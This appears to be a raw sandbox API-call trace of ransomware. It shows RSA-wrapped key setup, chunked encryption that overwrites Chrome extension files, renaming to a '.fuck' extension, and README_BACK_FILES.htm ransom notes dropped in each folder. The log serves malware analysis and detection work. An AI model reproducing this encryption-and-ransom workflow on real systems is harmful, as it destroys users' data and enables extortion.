[0258.326] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.326] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7a2e0) returned 1 [0258.326] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a2e0, dwCertEncodingType=0x1, pInfo=0x2e25d30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25d60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25d68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7fc80) returned 1 [0258.326] CryptEncrypt (in: hKey=0x2e7fc80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.326] CryptEncrypt (in: hKey=0x2e7fc80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7a368*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7a368*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.327] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e7a368*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7a368*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.328] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.330] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.330] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.332] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.332] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.332] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.332] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.332] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.332] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.333] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.333] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.333] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.333] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.333] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.333] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.333] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.333] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.333] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.334] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.334] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.334] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.334] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.334] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.334] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.335] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.335] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.335] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.335] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.335] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.335] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.335] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.336] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.336] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.336] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.336] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x1d4, lpOverlapped=0x0) returned 1 [0258.336] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x1d4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x1e0) returned 1 [0258.336] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x1e0, lpOverlapped=0x0) returned 1 [0258.336] CloseHandle (hObject=0x5d60) returned 1 [0258.336] CloseHandle (hObject=0x5d50) returned 1 [0258.336] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0258.339] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0258.339] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.gsg")) returned 1 [0258.341] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.fuck")) returned 1 [0258.342] CryptDestroyHash (hHash=0x2e7ff00) returned 1 [0258.342] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0258.342] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.342] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0258.342] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0258.342] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0258.342] AreFileApisANSI () returned 1 [0258.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0258.342] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.343] GetFileType (hFile=0x5d64) returned 0x1 [0258.343] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0258.344] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0258.344] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0258.344] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\readme_back_files.htm")) returned 0xffffffff [0258.344] AreFileApisANSI () returned 1 [0258.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e1f898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0258.344] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0258.345] GetFileType (hFile=0x5d4c) returned 0x1 [0258.345] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0258.346] FindNextFileA (in: hFindFile=0x28e8078, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0258.346] FindClose (in: hFindFile=0x28e8078 | out: hFindFile=0x28e8078) returned 1 [0258.346] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\readme_back_files.htm")) returned 0xffffffff [0258.346] AreFileApisANSI () returned 1 [0258.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e1f898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0258.346] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0258.348] GetFileType (hFile=0x5d40) returned 0x1 [0258.348] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0258.349] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0258.349] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fb00 [0258.350] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0258.350] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0258.350] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2e7fbc0 [0258.358] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0258.358] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 